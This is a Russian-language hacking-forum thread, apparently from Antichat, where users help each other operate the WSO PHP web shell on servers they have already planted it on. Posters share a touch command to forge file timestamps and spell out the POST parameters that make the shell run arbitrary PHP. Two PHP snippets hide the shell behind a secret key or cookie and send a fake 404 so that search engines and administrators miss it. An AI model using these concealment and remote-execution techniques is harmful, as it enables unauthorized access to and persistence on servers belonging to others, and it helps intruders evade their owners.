WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. balbesko

    balbesko New Member

    Joined:
    13 May 2011
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажите, можно ли с помощью wso изменить дату редактирования файла?
    если нет, то каким другим способом можно?
     
  2. Pernat1y

    Pernat1y Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    479
    Likes Received:
    79
    Reputations:
    7
    http://en.wikipedia.org/wiki/Touch_(Unix)
    touch -d '2007-01-31 8:46:26' index.html
     
    1 person likes this.
  3. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    Ребят, в можно юзать этот шел, в режиме выполнения get или post команд (с авторизацией)?

    если нет, то было б не плохо видеть в новой версии.

    пример:
    site.com/shell.php?p=pass&cmd=echo(111);
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    а что тебе мешает самому добавить эти возможности?
     
    _________________________
  5. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    всё очень просто: шеллЫ уже залиты...

    ".. знал бы прикуп жил бы в сочи" (С)

    Теоретически я могу конечно обработать и текущий шелл: авторизироваться постом, и послать форме name="pf" пост со значением <textarea name=code....> - php команды...

    Но это получается, извините через попу... (
     
    #225 slva2000, 17 Jun 2011
    Last edited: 17 Jun 2011
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    не могу понять твоей мысли:
    плюс чтоб потом не мучиться переправкой кода, можно добавить функцию обновления шелла с какого нить источника...
     
    _________________________
  7. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    условие такое: шелл править нет возможности.

    ты не о том...

    разобрал уже:

    постом отправлям сперва (шеллу):
    pass=password

    потом:
    a=php&p1=echo(11);

    в рузультате echo(11); выполняется на стороне сервера.

    думаю, это будет полезно прикрутить к ману шелла.
     
    #227 slva2000, 17 Jun 2011
    Last edited: 17 Jun 2011
  8. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Что тебе мешает написать небольшой скрипт, который будет логиниться в шелл и eval'ить твой код на стороне сервера?
    UPD: да что там даже логиниться - алгоритм генерации кукисов-то известен, пароль к шеллу ты сам задаешь.
     
    #228 Nek1t, 22 Jun 2011
    Last edited: 22 Jun 2011
  9. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Присутствует ли возможность редактирования базы данных?
     
  10. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    Да. Можно выполнить любой запрос к БД.
     
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    MySQL, PgSQL.
     
  12. Zaktema

    Zaktema New Member

    Joined:
    25 Dec 2010
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    Ещё было бы не плохо сделать при создании архива,указывать путь где сохранить.
    А то я например залил шелл,а заархивировать ничего не получается потому что в var/www/ каталоге права "Только чтение".
    А так бы можно было создать архив в каталоге var/tmp/
     
  13. Incorruptor

    Incorruptor New Member

    Joined:
    21 Jul 2011
    Messages:
    25
    Likes Received:
    2
    Reputations:
    5
    Насколько надежна филтрация поисковиков? Имеются в виду не только яндекс и гугл, но и совсем малоизвестные иностранные.
     
  14. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Относительно ненадежна.
    "Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"
    Однако можешь зделать требование, когда будет открываться шелл, а при обычном GET он выдадет 404.
     
  15. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Если б еще написали как это сделать, было бы замечательно!
    Думаю многим бы пригодилась бы, данная модификация..
     
  16. COOLBOY007

    COOLBOY007 Elder - Старейшина

    Joined:
    9 Jun 2009
    Messages:
    76
    Likes Received:
    43
    Reputations:
    22
    PHP:
    <?php
    if ($_GET['key'] == 'antichat') {
    // код шелла
    } else {
    echo 
    "
    <HTML><HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD><BODY>
    <H1>Not Found</H1>
    The requested URL was not found on this server.
    </BODY></HTML>
    "
    ;
    }
    ?>
    Далее чтоб открыть шелл открывай по адресу /shell.php?key=antichat
     
    1 person likes this.
  17. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    О боже... Такое чудо ни от поисковиков не спасёт, а только админов привлечёт.

    Нужен код 404 в HTTP заголовках, если его нет, шелл проиндексируют в е зависимости от контента. А GET вызовет лишнее палево в логах.

    Лучше использовать что то подобное:
    PHP:
    //В начало кода
    if(!isset($_COOKIE['ts'])) {
    header('HTTP/1.0 404 Not Found');
    exit;
    }
     
    2 people like this.
  18. miracles

    miracles New Member

    Joined:
    26 Jul 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    У меня одного доступ по паролю не работает? Ввожу пароль - ничего не происходит.
     
  19. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Значить пароль не верный.
     
  20. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    miracles, а ты пароль в мд5 вписывал?